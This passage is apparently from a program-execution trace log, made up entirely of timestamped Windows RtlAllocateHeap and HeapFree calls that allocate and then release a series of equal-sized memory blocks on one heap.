(HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x296c7a0 [0098.965] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x297f9b0 [0098.965] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2992bc0 [0098.966] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29a5dd0 [0098.966] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29b8fe0 [0098.967] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29cc1f0 [0098.967] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29df400 [0098.968] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x29f2610 [0098.968] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a05820 [0098.969] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a18a30 [0098.969] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a2bc40 [0098.969] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a3ee50 [0098.970] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a52060 [0098.970] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a65270 [0098.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a78480 [0098.971] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a8b690 [0098.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2a9e8a0 [0098.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ab1ab0 [0098.972] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ac4cc0 [0098.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ad7ed0 [0098.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2aeb0e0 [0098.973] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2afe2f0 [0098.974] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b11500 [0098.974] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b24710 [0098.975] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b37920 [0098.975] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b4ab30 [0098.976] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b5dd40 [0098.976] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b70f50 [0098.977] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b84160 [0098.977] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2b97370 [0098.978] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2baa580 [0098.978] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bbd790 [0098.978] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bd09a0 [0098.979] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2be3bb0 [0098.979] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2bf6dc0 [0098.980] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c09fd0 [0098.980] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c1d1e0 [0098.981] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c303f0 [0098.981] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c43600 [0099.182] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c56810 [0099.183] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c69a20 [0099.183] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c7cc30 [0099.183] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2c8fe40 [0099.184] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ca3050 [0099.184] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cb6260 [0099.185] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cc9470 [0099.185] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cdc680 [0099.186] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2cef890 [0099.186] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d02aa0 [0099.187] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d15cb0 [0099.187] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d28ec0 [0099.187] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d3c0d0 [0099.188] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d4f2e0 [0099.188] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d624f0 [0099.189] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d75700 [0099.189] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2d88910 [0099.190] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2db0080 [0099.191] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dc3290 [0099.192] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dd64a0 [0099.192] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2de96b0 [0099.193] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2dfc8c0 [0099.194] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e0fad0 [0099.194] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x9e0) returned 0x5bc5d0 [0099.194] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5a88f0 | out: hHeap=0x590000) returned 1 [0099.194] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e22ce0 [0099.195] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e35ef0 [0099.195] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e49100 [0099.196] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e5c310 [0099.196] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e6f520 [0099.197] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e82730 [0099.197] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2e95940 [0099.197] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ea8b50 [0099.198] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ebbd60 [0099.198] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ecef70 [0099.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ee2180 [0099.200] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2ef5390 [0099.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f085a0 [0099.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f1b7b0 [0099.201] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x13200) returned 0x2f2e9c0 [0099.448] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5bc5d0 | out: hHeap=0x590000) returned 1 [0106.986] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5c7460 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5e7260 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x5fa470 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x60d680 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x620890 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x633aa0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x646cb0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x659ec0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x66d0d0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1eb0080 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ec3290 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ed64a0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ee96b0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1efc8c0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f0fad0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f22ce0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f35ef0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f49100 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f5c310 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f6f520 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1f82730 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fb0080 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fc3290 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fd64a0 | out: hHeap=0x590000) returned 1 [0106.987] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1fe96b0 | out: hHeap=0x590000) returned 1 [0106.999] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x1ffc8c0 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x200fad0 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2022ce0 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2035ef0 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2049100 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x205c310 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x206f520 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2082730 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2095940 | out: hHeap=0x590000) returned 1 [0107.002] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20a8b50 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20bbd60 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20cef70 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20e2180 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x20f5390 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21085a0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x211b7b0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x212e9c0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2141bd0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2154de0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2167ff0 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x217b200 | out: hHeap=0x590000) returned 1 [0107.008] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x218e410 | out: hHeap=0x590000) returned 1 [0107.009] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21b0080 | out: hHeap=0x590000) returned 1 [0107.014] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21c3290 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21d64a0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21e96b0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x21fc8c0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x220fad0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2222ce0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2235ef0 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2249100 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x225c310 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x226f520 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2282730 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2295940 | out: hHeap=0x590000) returned 1 [0107.015] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22a8b50 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22bbd60 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22cef70 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22e2180 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x22f5390 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23085a0 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x231b7b0 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x232e9c0 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2341bd0 | out: hHeap=0x590000) returned 1 [0107.020] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2354de0 | out: hHeap=0x590000) returned 1 [0107.315] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2367ff0 | out: hHeap=0x590000) returned 1 [0107.316] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x237b200 | out: hHeap=0x590000) returned 1 [0107.316] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x238e410 | out: hHeap=0x590000) returned 1 [0107.316] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23a1620 | out: hHeap=0x590000) returned 1 [0107.316] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23b4830 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23c7a40 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23dac50 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x23ede60 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2401070 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2414280 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2427490 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x243a6a0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x244d8b0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2460ac0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2473cd0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2486ee0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x249a0f0 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24ad300 | out: hHeap=0x590000) returned 1 [0107.320] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24c0510 | out: hHeap=0x590000) returned 1 [0107.325] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24d3720 | out: hHeap=0x590000) returned 1 [0107.325] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24e6930 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x24f9b40 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x250cd50 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x251ff60 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2533170 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2546380 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2559590 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x256c7a0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x257f9b0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2592bc0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25b0080 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25c3290 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25d64a0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25e96b0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x25fc8c0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x260fad0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2622ce0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2635ef0 | out: hHeap=0x590000) returned 1 [0107.326] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2649100 | out: hHeap=0x590000) returned 1 [0107.333] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x265c310 | out: hHeap=0x590000) returned 1 [0107.334] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x266f520 | out: hHeap=0x590000) returned 1 [0107.334] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2682730 | out: hHeap=0x590000) returned 1 [0107.334] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2695940 | out: hHeap=0x590000) returned 1 [0107.334] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26a8b50 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26bbd60 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26cef70 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26e2180 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x26f5390 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27085a0 | out: hHeap=0x590000) returned 1 [0107.337] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x271b7b0 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x272e9c0 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2741bd0 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2754de0 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2767ff0 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x277b200 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x278e410 | out: hHeap=0x590000) returned 1 [0107.338] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27a1620 | out: hHeap=0x590000) returned 1 [0107.342] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27b4830 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27c7a40 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27dac50 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x27ede60 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2801070 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2814280 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2827490 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x283a6a0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x284d8b0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2860ac0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2873cd0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2886ee0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x289a0f0 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28ad300 | out: hHeap=0x590000) returned 1 [0107.346] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28c0510 | out: hHeap=0x590000) returned 1 [0107.558] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28d3720 | out: hHeap=0x590000) returned 1 [0107.558] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28e6930 | out: hHeap=0x590000) returned 1 [0107.558] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x28f9b40 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x290cd50 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x291ff60 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2933170 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2946380 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2959590 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x296c7a0 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x297f9b0 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2992bc0 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29a5dd0 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29b8fe0 | out: hHeap=0x590000) returned 1 [0107.559] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29cc1f0 | out: hHeap=0x590000) returned 1 [0107.563] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29df400 | out: hHeap=0x590000) returned 1 [0107.563] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x29f2610 | out: hHeap=0x590000) returned 1 [0107.563] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a05820 | out: hHeap=0x590000) returned 1 [0107.563] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a18a30 | out: hHeap=0x590000) returned 1 [0107.564] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a2bc40 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a3ee50 | out: hHeap=0x590000) returned 1 [0107.568] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x2a52060 | out: hHeap=0x590000) returned 1 